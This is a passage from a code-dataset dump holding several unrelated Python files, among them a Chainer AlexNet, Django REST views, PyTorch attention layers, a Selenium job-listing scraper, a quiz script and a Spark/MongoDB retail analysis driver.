headers={\"X-DL-AuthToken\": token})\n except Exception as e:\n raise storeClientError(e.message)\n return resp\n\n\n# SERVICE_URL -- Set the service url to use\n#\ndef set_svc_url(svc_url):\n \"\"\"Set the storage manager service URL.\n\n Parameters\n ----------\n svc_url : str\n The service URL of the storage manager to use \n\n Returns\n -------\n\n Example\n -------\n\n .. code-block:: python\n\n # set the service url\n\n url = \"http://dldemo.sdm.noao.edu:7003\"\n storeClient.set_scv_url(url)\n\n \"\"\"\n global DEF_SERVICE_URL\n DEF_SERVICE_URL = svc_url\n\n\n# PROFILES -- Get the profiles supported by the storage manager service\n#\ndef list_profiles(token, profile=None):\n \"\"\"Retrieve the profiles supported by the storage manager service\n\n Parameters\n ----------\n token : str\n Authentication token (see function :func:`dl.auth.login()`)\n\n profile : str\n A specific profile to list\n\n Returns\n -------\n profiles : list/dict\n A list of the names of the supported profiles or a dictionary of the\n specific profile\n\n Example\n -------\n\n .. code-block:: python\n\n # get the list of profiles\n profiles = storeClient.list_profiles(token)\n \"\"\"\n\n #headers = {'Content-Type': 'text/ascii',\n # 'X-DL-AuthToken': token} # application/x-sql\n dburl = 'profiles'\n if profile != None:\n dburl += \"/%s\" % profile\n r = getFromURL(dburl, token)\n profiles = r.content\n if '{' in profiles:\n profiles = json.load(StringIO(profiles))\n return profiles\n\n\n# PROFILES -- Set the profile to be used\n#\ndef set_profile(profile):\n \"\"\"Set the profile\n\n Parameters\n ----------\n profile : str\n The name of the profile to use. The list of available ones can be retrieved from the service (see function :func:`storeClient.list_profiles()`)\n\n Returns\n -------\n\n Example\n -------\n\n .. code-block:: python\n\n # set the profile\n storeClient.set_profile(\"default\")\n \"\"\"\n\n global PROFILE\n PROFILE = profile\n\n\n# PROFILES -- Set the profile to be used\n#\ndef get_profile(profile):\n \"\"\"Get the profile\n\n Parameters\n ----------\n\n Returns\n -------\n profile : str\n The name of the current profile used with the storage manager service\n\n\n Example\n -------\n\n .. code-block:: python\n\n # get the profile\n storeClient.get_profile()\n \"\"\"\n\n return PROFILE\n","sub_path":"build/lib/dl/storeClient.py","file_name":"storeClient.py","file_ext":"py","file_size_in_byte":17963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"320956681","text":"import chainer\nimport chainer.functions as F\nimport chainermnx.functions as FX\nimport chainer.links as L\nimport chainermnx.links as LX\nimport chainermnx\nimport cupy as cp\n\n\nclass AlexNet(chainer.Chain):\n\n def __init__(self, comm):\n super(AlexNet, self).__init__()\n self.comm = comm\n self.n_proc = self.comm.size\n with self.init_scope():\n self.conv1 = LX.Convolution2D(self.comm, 1, None, 96, 11, stride=4)\n self.conv2 = LX.Convolution2D(self.comm, 2, None, 256, 3, pad=(0, 1))\n self.conv3 = LX.Convolution2D(self.comm, 3, None, 384, 3, pad=(0, 1))\n self.conv4 = LX.Convolution2D(self.comm, 4, None, 384, 3, pad=(0, 1))\n self.conv5 = L.Convolution2D(None, 256, 3, pad=1)\n self.fc6 = L.Linear(None, 4096)\n self.fc7 = L.Linear(None, 4096)\n self.fc8 = L.Linear(None, 1000)\n\n def forward(self, x):\n partions = cp.array_split(x, self.comm.size, -2)\n # This part needs fixing. Probably all conditions are not checked\n if self.comm.rank == 0:\n x = partions[0]\n elif self.comm.rank == 1:\n x = partions[1]\n elif self.comm.rank == 2:\n x = partions[2]\n elif self.comm.rank == 3:\n x = partions[3]\n else:\n print(\"Rank does not exist\")\n\n h = FX.halo_exchange(self.comm, x, k_size=5, index=1, pad=0)\n h = F.relu(self.conv1(h))\n\n h = FX.pooling_halo_exchange(self.comm, h, k_size=3, index=11)\n h = F.max_pooling_2d(h, ksize=3, stride=2)\n\n h = FX.halo_exchange(self.comm, h, k_size=3, index=2, pad=1)\n h = F.relu(self.conv2(h))\n\n h = FX.pooling_halo_exchange(self.comm, h, k_size=3, index=22)\n h = F.max_pooling_2d(h, ksize=3, stride=2)\n\n h = FX.halo_exchange(self.comm, h, k_size=3, index=3, pad=1)\n h = F.relu(self.conv3(h))\n\n h = FX.halo_exchange(self.comm, h, k_size=3, index=4, pad=1)\n h = F.relu(self.conv4(h))\n\n h = FX.halo_exchange(self.comm, h, k_size=3, index=5, pad=1)\n h = F.relu(self.conv5(h))\n h = F.max_pooling_2d(h, ksize=3, stride=2)\n hs = chainermnx.functions.spatialallgather(self.comm, h)\n h = F.concat(hs, -2)\n\n h = F.dropout(F.relu(self.fc6(h)))\n h = F.dropout(F.relu(self.fc7(h)))\n h = self.fc8(h)\n\n # loss = F.softmax_cross_entropy(h, t)\n # chainer.report({'loss': loss, 'accuracy': F.accuracy(h, t)}, self)\n # return loss\n return h\n\n\n\n\n","sub_path":"hybrid_2/models/alexnet.py","file_name":"alexnet.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"117488635","text":"from rest_framework.decorators import api_view,permission_classes\nfrom rest_framework.permissions import IsAuthenticated,IsAuthenticatedOrReadOnly\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework import generics\n\nfrom neighbourhood.models import *\nfrom account.serializers import *\nfrom neighbourhood.serializers import *\n\n@api_view(['GET','POST'])\n@permission_classes([IsAuthenticatedOrReadOnly])\ndef neighbour_view(request):\n data = {}\n\n if request.method == 'GET':\n neighbourhoods = Neighbourhood.objects.all()\n data = GetNeighbourhoodSerializer(neighbourhoods,many=True).data\n \n return Response(data,status = status.HTTP_200_OK)\n\n elif request.method == 'POST':\n serializer = NeighbourhoodSerializer(data = request.data)\n if serializer.is_valid():\n serializer.save(request)\n data['success'] = \"The neighbourhood was created successfully\"\n return Response(data,status = status.HTTP_201_CREATED)\n\n else:\n data = serializer.errors\n return Response(data,status = status.HTTP_400_BAD_REQUEST)\n\nclass LocationList(generics.ListAPIView):\n queryset = Location.objects.all()\n serializer_class = LocationSerializer\n permission_classes = [IsAuthenticated]\n\n\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef join_neighbourhood(request,pk):\n data = {}\n profile = Profile.objects.get(user = request.user)\n neighbourhood = Neighbourhood.objects.get(pk=pk)\n profile.neighbourhood = neighbourhood\n profile.save()\n data['success'] = f\"You successfully joined ${neighbourhood.slogan}\"\n return Response(data,status = status.HTTP_200_OK)\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef move_out(request):\n data = {}\n profile = Profile.objects.get(user = request.user)\n profile.neighbourhood = None\n profile.save()\n data['success'] = \"You are no longer a member of the neighbourhood!\"\n return Response(data,status = status.HTTP_200_OK)\n\n\n\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_neighbourhood(request):\n data = {}\n profile = Profile.objects.get(user = request.user)\n print(profile.neighbourhood)\n data = ProfileSerializer(profile).data\n return Response(data,status = status.HTTP_200_OK)\n\n@api_view(['GET','POST'])\n@permission_classes([IsAuthenticatedOrReadOnly])\ndef business_view(request):\n data ={}\n\n if request.method == 'GET':\n businesses = Business.objects.all()\n data = BusinessSerializer(businesses,many=True).data\n\n return Response(data,status = status.HTTP_200_OK)\n\n elif request.method == 'POST':\n serializer = BusinessSerializer(data = request.data)\n if serializer.is_valid():\n serializer.save(request)\n data['success'] = \"The bussiness was created successfully\"\n\n return Response(data,status = status.HTTP_201_CREATED)\n\n else:\n data = serializer.errors\n return Response(data,status = status.HTTP_400_BAD_REQUEST)\n\n@api_view(['POST','GET'])\n@permission_classes([IsAuthenticatedOrReadOnly])\ndef occurence_view(request,pk):\n data = {}\n\n try:\n neighbourhood = Neighbourhood.objects.get(pk=pk)\n except :\n data['not found'] = \"The neighbourhood was not found\"\n return Response(data,status = status.HTTP_404_NOT_FOUND)\n\n if request.method == 'POST':\n serializer = OccurrenceSerializer(data = request.data)\n\n if serializer.is_valid():\n serializer.save(request,neighbourhood)\n data['success'] = \"The occurrence was successfully reported\"\n return Response(data,status = status.HTTP_200_OK)\n\n else:\n data = serializer.errors\n print(data)\n return Response(data,status = status.HTTP_400_BAD_REQUEST)\n\n elif request.method == 'GET':\n events = Occurrence.get_events(pk)\n data = OccurrenceSerializer(events,many=True).data\n\n return Response(data,status= status.HTTP_200_OK)\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_businesses(request,pk):\n \"\"\"The view for getting all businesses in a neighbourhood\n\n Args:\n request ([type]): [description]\n pk ([type]): [description]\n \"\"\"\n businesses = Business.get_bussinesses(pk)\n data = {}\n data['businesses'] = BusinessSerializer(businesses,many=True).data\n\n return Response(data,status.HTTP_200_OK)\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_residents(request,pk):\n \"\"\"This parses the request to get the users in a certain neighbourhood\n\n Args:\n request ([type]): [description]\n pk ([type]): [description]\n \"\"\"\n data = {}\n users = Profile.get_residents(pk)\n\n data['users'] = UserSerializer(users,many=True).data\n return Response(data,status = status.HTTP_200_OK)\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef search_business(request,term):\n \"\"\"This parses the view request for getting the businesses via a search term\n\n Args:\n request ([type]): [description]\n \"\"\"\n data = {}\n\n results = Business.search_by_name(term)\n\n data['businesses'] = BusinessSerializer(results,many=True).data\n return Response(data,status=status.HTTP_200_OK)\n\nclass EventTypeList(generics.ListAPIView):\n queryset = EventType.objects.all()\n serializer_class = EventSerializer\n permission_classes=[IsAuthenticated]\n\nclass ServiceList(generics.ListAPIView):\n queryset = Services.objects.all()\n serializer_class = ServiceSerializer\n permission_classes = [IsAuthenticated]","sub_path":"neighbourhood/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"228046324","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom operations import *\r\nfrom torch.autograd import Variable\r\nfrom genotypes import PRIMITIVES\r\n# from utils.darts_utils import drop_path, compute_speed, compute_speed_tensorrt\r\nfrom pdb import set_trace as bp\r\nimport numpy as np\r\nfrom thop import profile\r\nfrom matplotlib import pyplot as plt\r\nfrom util_gan.vgg_feature import VGGFeature\r\nfrom thop import profile\r\n\r\n\r\ndef make_divisible(v, divisor=8, min_value=3):\r\n \"\"\"\r\n forked from slim:\r\n https://github.com/tensorflow/models/blob/\\\r\n 0344c5503ee55e24f0de7f37336a6e08f10976fd/\\\r\n research/slim/nets/mobilenet/mobilenet.py#L62-L69\r\n \"\"\"\r\n if min_value is None:\r\n min_value = divisor\r\n new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)\r\n # Make sure that round down does not go down by more than 10%.\r\n if new_v < 0.9 * v:\r\n new_v += divisor\r\n return new_v\r\n\r\n# https://github.com/YongfeiYan/Gumbel_Softmax_VAE/blob/master/gumbel_softmax_vae.py\r\ndef sample_gumbel(shape, eps=1e-20):\r\n U = torch.rand(shape)\r\n U = U.cuda()\r\n return -torch.log(-torch.log(U + eps) + eps)\r\n\r\n\r\ndef gumbel_softmax_sample(logits, temperature=1):\r\n y = logits + sample_gumbel(logits.size())\r\n return F.softmax(y / temperature, dim=-1)\r\n\r\n\r\ndef gumbel_softmax(logits, temperature=1, hard=False):\r\n \"\"\"\r\n ST-gumple-softmax\r\n input: [*, n_class]\r\n return: flatten --> [*, n_class] an one-hot vector\r\n \"\"\"\r\n y = gumbel_softmax_sample(logits, temperature)\r\n \r\n if not hard:\r\n return y\r\n\r\n shape = y.size()\r\n _, ind = y.max(dim=-1)\r\n y_hard = torch.zeros_like(y).view(-1, shape[-1])\r\n y_hard.scatter_(1, ind.view(-1, 1), 1)\r\n y_hard = y_hard.view(*shape)\r\n # Set gradients w.r.t. y_hard gradients w.r.t. y\r\n y_hard = (y_hard - y).detach() + y\r\n return y_hard\r\n\r\n\r\nclass MixedOp(nn.Module):\r\n def __init__(self, C_in, C_out, op_idx, quantize, stride=1):\r\n super(MixedOp, self).__init__()\r\n self._op = OPS[PRIMITIVES[op_idx]](C_in, C_out, stride, slimmable=False, width_mult_list=[1.])\r\n self.quantize = quantize\r\n\r\n def forward(self, x):\r\n return self._op(x, quantize=self.quantize)\r\n\r\n def forward_latency(self, size):\r\n # int: force #channel; tensor: arch_ratio; float(<=1): force width\r\n latency, size_out = self._op.forward_latency(size)\r\n return latency, size_out\r\n\r\n def forward_flops(self, size):\r\n # int: force #channel; tensor: arch_ratio; float(<=1): force width\r\n flops, size_out = self._op.forward_flops(size, quantize=self.quantize)\r\n\r\n return flops, size_out\r\n\r\n\r\nclass SingleOp(nn.Module):\r\n def __init__(self, op, C_in, C_out, kernel_size=3 , stride=1, quantize=True):\r\n super(SingleOp, self).__init__()\r\n self._op = op(C_in, C_out, kernel_size=kernel_size, stride=stride, slimmable=False, width_mult_list=[1.])\r\n self.quantize = quantize\r\n\r\n def forward(self, x):\r\n result = self._op(x, quantize=self.quantize)\r\n\r\n return result\r\n\r\n def forward_flops(self, size):\r\n flops, size_out = self._op.forward_flops(size, quantize=self.quantize)\r\n\r\n return flops, size_out\r\n\r\n\r\n\r\nclass NAS_GAN_Eval(nn.Module):\r\n def __init__(self, alpha, beta, ratio, beta_sh, ratio_sh, layers=16, width_mult_list=[1.,], width_mult_list_sh=[1.,], quantize=True):\r\n super(NAS_GAN_Eval, self).__init__()\r\n assert layers >= 3\r\n self._layers = layers\r\n self._width_mult_list = width_mult_list\r\n self._width_mult_list_sh = width_mult_list_sh\r\n self._flops = 0\r\n self._params = 0\r\n\r\n self.len_stem = 3\r\n self.len_header = 3\r\n self.len_beta_sh = self.len_stem + self.len_header\r\n self.len_ratio_sh = self.len_stem + self.len_header - 1\r\n\r\n op_idx_list = F.softmax(alpha, dim=-1).argmax(-1)\r\n\r\n if quantize == 'search':\r\n quantize_list = F.softmax(beta, dim=-1).argmax(-1) == 1\r\n quantize_list_sh = F.softmax(beta_sh, dim=-1).argmax(-1) == 1\r\n elif quantize:\r\n quantize_list = [True for _ in range(layers)]\r\n quantize_list_sh = [True for _ in range(beta_sh.size(0))] \r\n else:\r\n quantize_list = [False for _ in range(layers)]\r\n quantize_list_sh = [False for _ in range(beta_sh.size(0))]\r\n\r\n ratio_list = F.softmax(ratio, dim=-1).argmax(-1)\r\n ratio_list_sh = F.softmax(ratio_sh, dim=-1).argmax(-1)\r\n\r\n # Construct Stem\r\n self.stem = nn.ModuleList()\r\n self.stem.append(SingleOp(ConvNorm, 3, make_divisible(64*width_mult_list_sh[ratio_list_sh[0]]), 7, quantize=quantize_list_sh[0]))\r\n\r\n in_features = 64\r\n out_features = in_features*2\r\n\r\n for i in range(2):\r\n self.stem.append(SingleOp(ConvNorm, make_divisible(in_features*width_mult_list_sh[ratio_list_sh[i]]), make_divisible(out_features*width_mult_list_sh[ratio_list_sh[i+1]]), 3, stride=2, quantize=quantize_list_sh[1+i]))\r\n in_features = out_features\r\n out_features = in_features*2\r\n\r\n # Construct Blocks\r\n self.cells = nn.ModuleList()\r\n for i in range(layers):\r\n if i == 0:\r\n self.cells.append(MixedOp(make_divisible(in_features * width_mult_list_sh[ratio_list_sh[self.len_stem-1]]), make_divisible(in_features * width_mult_list[ratio_list[i]]), op_idx_list[i], quantize_list[i]))\r\n else:\r\n self.cells.append(MixedOp(make_divisible(in_features * width_mult_list[ratio_list[i-1]]), make_divisible(in_features * width_mult_list[ratio_list[i]]), op_idx_list[i], quantize_list[i]))\r\n\r\n # Construct Header\r\n self.header = nn.ModuleList()\r\n\r\n out_features = in_features//2\r\n \r\n self.header.append(SingleOp(ConvTranspose2dNorm, make_divisible(in_features*width_mult_list[ratio_list[self._layers-1]]), make_divisible(out_features*width_mult_list_sh[ratio_list_sh[self.len_stem]]), 3, stride=2, quantize=quantize_list_sh[self.len_stem]))\r\n \r\n in_features = out_features\r\n out_features = in_features//2\r\n \r\n self.header.append(SingleOp(ConvTranspose2dNorm, make_divisible(in_features*width_mult_list_sh[ratio_list_sh[self.len_stem]]), make_divisible(out_features*width_mult_list_sh[ratio_list_sh[self.len_stem+1]]), 3, stride=2, quantize=quantize_list_sh[self.len_stem+1]))\r\n\r\n self.header.append(SingleOp(Conv, make_divisible(64*width_mult_list_sh[ratio_list_sh[self.len_stem+1]]), 3, 7, quantize=quantize_list_sh[self.len_stem+2]))\r\n \r\n self.tanh = nn.Tanh()\r\n\r\n\r\n def forward(self, input):\r\n\r\n out = input\r\n for i, module in enumerate(self.stem):\r\n out = module(out)\r\n\r\n for i, cell in enumerate(self.cells):\r\n out = cell(out)\r\n\r\n for i, module in enumerate(self.header):\r\n out = module(out)\r\n\r\n out = self.tanh(out)\r\n\r\n return out\r\n\r\n \r\n def forward_flops(self, size):\r\n flops_total = []\r\n\r\n for i, module in enumerate(self.stem):\r\n flops, size = module.forward_flops(size) \r\n flops_total.append(flops)\r\n\r\n for i, cell in enumerate(self.cells):\r\n flops, size = cell.forward_flops(size)\r\n flops_total.append(flops)\r\n\r\n for i, module in enumerate(self.header):\r\n flops, size = module.forward_flops(size) \r\n flops_total.append(flops)\r\n\r\n return sum(flops_total)\r\n\r\n\r\n","sub_path":"AGD_ST/search/model_eval.py","file_name":"model_eval.py","file_ext":"py","file_size_in_byte":7597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"234111547","text":"from selenium import webdriver\nfrom lxml import etree\nimport time\nimport pymongo\n\n\ndef parse_html():\n # 打开第一页,并获取页面上的所有的url\n driver = webdriver.Chrome()\n url = 'https://www.lagou.com/jobs/list_python?city=%E4%B8%8A%E6%B5%B7&cl=false&fromSearch=true&labelWords=&suginput='\n driver.get(url)\n driver.maximize_window()\n html = etree.HTML(driver.page_source)\n liTags = html.xpath('//li[@data-positionid]')\n\n while True:\n for li in liTags:\n # get positionid\n positionId = li.xpath('./@data-positionid')[0]\n print(positionId)\n\n # 打开详情页面,并解析数据\n parse_detail(driver, positionId)\n print('-' * 40)\n try:\n # 点击下一页\n next_btn = driver.find_element_by_xpath(\"//span[@action='next']\")\n next_btn.click()\n time.sleep(0.5)\n # 获取新页面的liTags,继续循环抓取\n html = etree.HTML(driver.page_source)\n liTags = html.xpath('//li[@data-positionid]')\n except Exception:\n print('over')\n break\n\n\ndef parse_detail(driver, positionId):\n url = 'https://www.lagou.com/jobs/{}.html'.format(positionId)\n\n # 打开详情页,新窗口\n js = 'window.open(\"{}\")'.format(url)\n driver.execute_script(js)\n print(js)\n time.sleep(1)\n # 切换句柄到 新窗口\n driver.switch_to_window(driver.window_handles[-1])\n\n # 获取页面中需要的数据信息\n html = etree.HTML(driver.page_source)\n position = {\n 'title': html.xpath(\"//span[@class='name']/text()\")[0],\n 'salary': html.xpath(\"//span[@class='salary']/text()\")[0],\n 'publish_time': str(html.xpath(\"//p[@class='publish_time']/text()\")[0]).split()[0],\n 'company': html.xpath(\"//div[@class='company']/text()\")[0],\n 'work_addr': ''.join(html.xpath(\"//div[@class='work_addr']/a/text()\")[0:-1])\n }\n # print(position)\n\n # 4. insert data\n mycol = conMongoDB()\n x = mycol.insert_one(position)\n print('{}:插入成功,id:{}'.format(positionId, x.inserted_id))\n\n # 操作完毕后,关闭该窗口\n driver.close()\n # 切换句柄到主窗口\n driver.switch_to_window(driver.window_handles[0])\n\n\ndef conMongoDB():\n # 1. 连接mongo服务,返回client对象\n myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n # 2. use db\n mydb = myclient[\"qa\"]\n # 3. use collection(table)\n mycol = mydb[\"job\"]\n return mycol\n\n\ndef main():\n parse_html()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"advanced/爬虫/【12】selenium拉勾网实战.py","file_name":"【12】selenium拉勾网实战.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"344342835","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Dot_Attn(nn.Module):\n def __init__(self, hidden_size):\n super(Dot_Attn, self).__init__()\n\n def forward(self, decoder_hidden, encoder_outputs):\n # decoder_hidden: [1, batch_size, hidden_size]\n # encoder_outputs: [seq_len, batch_size, hidden_size]\n seq_len = encoder_outputs.size(0)\n batch_size = encoder_outputs.size(1)\n hidden_size = encoder_outputs.size(2)\n\n # dot product attention\n # hidden: [batch_size, seq_len, hidden_size]\n # encoder_outputs: [batch_size, seq_len, hidden_size]\n # attention_weight: [batch_size, seq_len, hidden_size]\n encoder_outputs = encoder_outputs.transpose(0, 1)\n decoder_hidden = decoder_hidden.transpose(0, 1).repeat(1, seq_len, 1)\n attention = encoder_outputs * decoder_hidden\n\n # attention_weight: [batch_size, seq_len]\n attention = torch.sum(attention, dim=2)\n attention = F.softmax(attention, dim=1)\n\n # attention_weight: [batch_size, seq_len, 1]\n attention = attention.unsqueeze(2)\n\n # context_vector: [batch_size, seq_len, hidden_size]\n context = attention * encoder_outputs\n\n # context: [batch_size, hidden_size]\n context = torch.sum(context, dim=1)\n # context: [1, batch_size, hidden_size]\n context = context.unsqueeze(0)\n return context\n\n\nclass Concat_Attn(nn.Module):\n def __init__(self, hidden_size):\n super(Concat_Attn, self).__init__()\n self.attn = nn.Linear(2*hidden_size, hidden_size)\n self.fc = nn.Linear(hidden_size, 1, bias=False)\n\n def forward(self, decoder_hidden, encoder_outputs):\n # decoder_hidden: [1, batch_size, hidden_size]\n # encoder_outputs: [seq_len, batch_size, hidden_size]\n seq_len = encoder_outputs.size(0)\n\n # repeat decoder hidden state seq_len times\n # hidden: [batch_size, seq_len, hidden_size]\n # encoder_outputs: [batch_size, seq_len, hidden_size]\n decoder_hidden = decoder_hidden.repeat(seq_len, 1, 1).permute(1, 0, 2)\n encoder_outputs = encoder_outputs.permute(1, 0, 2)\n\n # energy: [batch_size, seq_len, 2*hidden_size]\n # energy: [batch_size, seq_len, hidden_size]\n energy = torch.cat((decoder_hidden, encoder_outputs), dim=2)\n energy = self.attn(energy)\n energy = torch.tanh(energy)\n\n # attention: [batch_size, seq_len, 1]\n # attention: [batch_size, seq_len]\n attention = self.fc(energy)\n attention = attention.squeeze(2)\n attention = F.softmax(attention, dim=1)\n\n # attn_weights: [batch_size, 1, seq_len]\n attention = attention.unsqueeze(1)\n\n # context: [batch_size, 1, hidden_size]\n context = attention.bmm(encoder_outputs)\n\n # context: [1, batch_size, hidden_size]\n context = context.permute(1, 0, 2)\n return context\n\n\nclass General_Attn(nn.Module):\n def __init__(self, hidden_size):\n super(General_Attn, self).__init__()\n self.attn = nn.Linear(hidden_size, hidden_size)\n\n def forward(self, decoder_hidden, encoder_outputs):\n # decoder_hidden: [1, batch_size, hidden_size]\n # encoder_outputs: [seq_len, batch_size, hidden_size]\n\n # decoder_hidden: [batch_size, 1, hidden_size]\n # encoder_outputs: [batch_size, seq_len, hidden_size]\n # attention: [batch_size, seq_len, hidden_size]\n decoder_hidden = decoder_hidden.transpose(0, 1)\n encoder_outputs = encoder_outputs.transpose(0, 1)\n attention = self.attn(encoder_outputs)\n\n # attention: [batch_size, seq_len]\n attention = torch.sum(decoder_hidden * attention, dim=2)\n attention = F.softmax(attention, dim=1)\n\n # attention: [batch_size, 1, seq_len]\n attention = attention.unsqueeze(1)\n\n # context: [batch_size, 1, hidden_size]\n context = attention.bmm(encoder_outputs)\n\n # context: [1, batch_size, hidden_size]\n context = context.permute(1, 0, 2)\n return context\n","sub_path":"seq2seq_attention2/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"599425315","text":"import os\r\nfile = open(\"start.txt\",\"r\").read()\r\nquestion, score = open(\"questions.txt\",\"r\").readlines(), 0\r\nfor i in range(int(len(question)/6)):\r\n print(\"\\n\"*8,*file % (i+1),*question[i*6:(i*6)+5],sep=\"\")\r\n if i == 3:\r\n os.system(\"start img/Death.png\") \r\n elif i == 10:\r\n os.system(\"start img/Logo.png\")\r\n user = input(\">>> \")\r\n while not user in [\"1\",\"2\",\"3\",\"4\"]:\r\n user = input(\"Inccorect Input!\\n>>> \")\r\n if user == question[(i*6)+5][0]:\r\n score += 1\r\nif score <= int(int(len(question)/6)/2):\r\n print(open(\"bad.txt\",\"r\").read())\r\nelse:\r\n print(open(\"welldone.txt\",\"r\").read())\r\nprint(\"You scored\",str(score)+\"/\"+str(int(len(question)/6))),input()\r\n","sub_path":"Python/PYTHONchallenges/Python/Python/challenges/quiz/Harry Potter/Harry_potter_quiz.py","file_name":"Harry_potter_quiz.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"298837837","text":"import pandas as pd\n# Due to specifics of installation on my machine\n# these lines need to be executed before importing Spark\n# Feel free to comment them out or delete them\n#################\nimport findspark\nfindspark.init()\n#################\nfrom pyspark.sql import SparkSession\nfrom src.spark_queries import QuestionAnswerer\nfrom src.mongoimport import MongoImportDF\nfrom pymongo import MongoClient\n\nmongo_uri = \"mongodb://localhost:27017/\"\ncollection_name = \"final_collection\"\ndb_name = \"final_db\"\nmongodb_input_uri = \"mongodb://127.0.0.1/\" + db_name + '.' + collection_name\nmongodb_output_uri = \"mongodb://127.0.0.1/\" + db_name + '.' + collection_name\nxslx_name = 'Online Retail.xlsx'\nsave_directory = 'Output'\n\n# Utility functions used to generate interactive interface\n# for each of the questions\n\n\ndef message():\n print('Press question number, \\'l\\' to list questions or \\'q\\' to quit\\n')\n\n\ndef list_question():\n print('Question 1: Group all transactions by invoice \\n')\n print('Question 2: Which product sold the most? \\n')\n print('Question 3: Which customer spent the most money? \\n')\n print('Question 4: A chart showing the distribution of each product\\\n for each of the available countries')\n print('Question 5: What is the average unit price?')\n print('Question 6: A chart showing the distribution of prices')\n print('Question 7: The ratio between price and quantity for each invoice')\n\n\ndef question_1(qa):\n print('Question 1: Group all transactions by invoice \\n')\n print('Cant display grouped data :(')\n print(qa.group_by_invoice())\n\n\ndef question_2(qa):\n print('Question 2: Which product sold the most? \\n')\n print('The product(s) with StockCode(s) {} sold the most'\n .format(qa.the_most_sold_product()))\n\n\ndef question_3(qa):\n print('Question 3: Which customer spent the most money? \\n')\n print('The customer(s) with CustomerID(s) {} spent the most money'\n .format(qa.customer_spent_the_most))\n\n\ndef question_4(qa, save=False, show=False):\n print('Question 4: A chart showing the distribution of each product\\\n for each of the available countries')\n print('Description (d) or StockCode? (s)\\n')\n answer = input()\n if answer not in ['d', 's']:\n raise Exception('Invalid Answer!\\n')\n if answer == 'd':\n column = 'Description'\n else:\n column = 'StockCode'\n print('Input {}\\n'.format(column))\n product = input()\n print('Save(s), show(w) the chart or both (sw)?\\n')\n answer = input()\n if 's' in answer:\n save = True\n if 'w' in answer:\n show = True\n qa.product_by_country_distribution(product, column, save, show)\n print('Done')\n\n\ndef question_5(qa):\n print('Question 5: What is the average unit price?')\n print('Description (d) or StockCode? (s)\\n')\n answer = input()\n if answer not in ['d', 's']:\n raise Exception('Invalid Answer!\\n')\n if answer == 'd':\n column = 'Description'\n else:\n column = 'StockCode'\n qa.avg_unit_price(column).show()\n\n\ndef question_6(qa, save=False, show=False):\n print('Question 6: A chart showing the distribution of prices')\n column = input()\n print('Description, InvoiceNo, Country or StockCode?\\n')\n print('Input {}\\n'.format(column))\n name = input()\n print('Save(s), show(w) the chart or both (sw)?\\n')\n answer = input()\n if 's' in answer:\n save = True\n if 'w' in answer:\n show = True\n qa.price_distribution(column, name, save, show)\n\n\ndef question_7(qa, save=False, show=False):\n print('Question 7: The ratio between price and \\\n quantity for each invoice')\n print('Input InvoiceNo\\n')\n invoice_no = int(input())\n print('Save(s), show(w) the chart or both (sw)?\\n')\n answer = input()\n if 's' in answer:\n save = True\n if 'w' in answer:\n show = True\n qa.price_quantity_ratio(invoice_no, save, show)\n\n\nif __name__ == \"__main__\":\n #The MongoDB import part starts here\n print('Connecting to MongoDB...\\n')\n my_client = MongoClient(mongo_uri)\n print('Connected\\n')\n print('Reading xslx...')\n df = pd.read_excel(xslx_name, engine='openpyxl')\n print('Read!')\n midf = MongoImportDF(df, my_client, db_name, collection_name)\n print('Started import of dataframe into MongoDB...')\n midf.mongo_import()\n print('Import finished, database \"{}\", collection \"{}\"\\n'\n .format(db_name, collection_name))\n # The MongoDB import part starts here\n # The Spark Part starts here\n print('Creating Spark Session...\\n')\n my_spark = SparkSession \\\n .builder \\\n .appName(\"OnlineRetail\") \\\n .config(\"spark.mongodb.input.uri\",\n mongodb_input_uri) \\\n .config(\"spark.mongodb.output.uri\",\n mongodb_output_uri) \\\n .config(\"spark.jars.packages\",\n \"org.mongodb.spark:mongo-spark-connector_2.12:3.0.0\")\\\n .getOrCreate()\n print('Spark session created\\n')\n print('Creating Spark dataframe from MongoDB...\\n')\n spark_df = my_spark.read.format(\"mongo\").load()\n print('Spark dataframe created\\n')\n qa = QuestionAnswerer(spark_df)\n # The Spark Part ends here. The queries can be executed by directly calling\n # the methods of QuestionAnswerer\n command = 'l'\n\n switcher = {\n '1': question_1,\n '2': question_2,\n '3': question_3,\n '4': question_4,\n '5': question_5,\n '6': question_6,\n '7': question_7\n }\n\n while command != 'q':\n message()\n command = input()\n if command == 'l':\n list_question()\n else:\n switcher.get(command, 'Wrong Input!')(qa)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"602242855","text":"\"\"\"\nGiven a sorted integer array without duplicates, return the summary of its ranges.\nidea: 2 ptr, print_range\ncomp: O(n)\n\"\"\"\n\n\ndef summary_ranges(arr):\n if not arr:\n return []\n res, left, right = [], 0, 0\n while right < len(arr) - 